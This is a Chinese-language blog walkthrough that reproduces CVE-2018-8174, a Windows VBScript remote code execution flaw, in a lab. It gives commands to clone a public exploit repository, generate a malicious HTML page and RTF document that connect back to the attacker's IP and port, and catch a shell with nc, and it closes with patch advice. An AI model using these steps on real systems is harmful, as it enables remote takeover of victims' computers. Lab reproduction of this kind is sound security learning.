如何进行0day漏洞CVE-2018-8174复现

本篇文章为大家展示了如何进行0day漏洞CVE-2018-8174复现,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。

漏洞描述:

CVE-2018-8174是Windows VBScriptEngine 代码执行漏洞,由于 VBScript 脚本执行引擎(vbscript.dll)存在该漏洞,攻击者可以将恶意的VBScript嵌入到Office文件或者网站中,一旦用户受诱导或不慎点击恶意链接或文档,攻击者便可远程获取当前用户系统权限,进而完全控制用户电脑。

2018年4月18日国内某信息安全公司监控到一例使用该漏洞的攻击活动后,当天与微软公司沟通,将相关信息提交到微软。微软在4月20日确认此漏洞,于5月8号发布了官方安全补丁对其进行修复,并将其命名为 CVE-2018-8174,在国内该漏洞则被称为“双杀”漏洞。

复现过程

攻击机:Linuxkali    ip:192.168.1.117

靶机:Windows7专业版    ip:192.168.1.118

注:本次由于靶机环境限制,仅以网站点击恶意链接获取权限方法验证该漏洞

首先从github下载项目:

#git clone https://github.com/Sch01ar/CVE-2018-8174_EXP

如何进行0day漏洞CVE-2018-8174复现

生成带有恶意VBscript的html页面和word文档

#pythonCVE-2018-8174.py -u http://192.168.220.117/exploit.html -o msf.rtf -i192.168.220.117 -p 4444如何进行0day漏洞CVE-2018-8174复现

其中:-u指定URL 地址,-o指定生成文档,-i指定监听地址,-p指定监听端口

注:生成之前需进入到项目文件夹下,否则提示找不到文件

 生成后ls查看当前目录下的文件,确保所需要的文件完整

如何进行0day漏洞CVE-2018-8174复现将explot.html复制到/var/www/html路径下,并开启apache服务

如何进行0day漏洞CVE-2018-8174复现nc指令,用于监听4444端口如何进行0day漏洞CVE-2018-8174复现

开始监听后,我们用靶机,也就是windows7浏览器打开攻击机生成的恶意链接:192.168.1.117/exploit.html如何进行0day漏洞CVE-2018-8174复现

虽然网页报错,但可以  发现攻击机已经拿到靶机的系统权限如何进行0day漏洞CVE-2018-8174复现

修复建议

此漏洞已在2018年5月8日被微软官方修复,win10不受此漏洞影响,win10以下版本安装过该补丁后不受此漏洞影响。

上述内容就是如何进行0day漏洞CVE-2018-8174复现,你们学到知识或技能了吗?如果还想学到更多技能或者丰富自己的知识储备,欢迎关注亿速云行业资讯频道。

原创文章,作者:kirin,如若转载,请注明出处:https://blog.ytso.com/220290.html

(0)
上一篇 2022年1月2日
下一篇 2022年1月2日

相关推荐

发表回复

登录后才能评论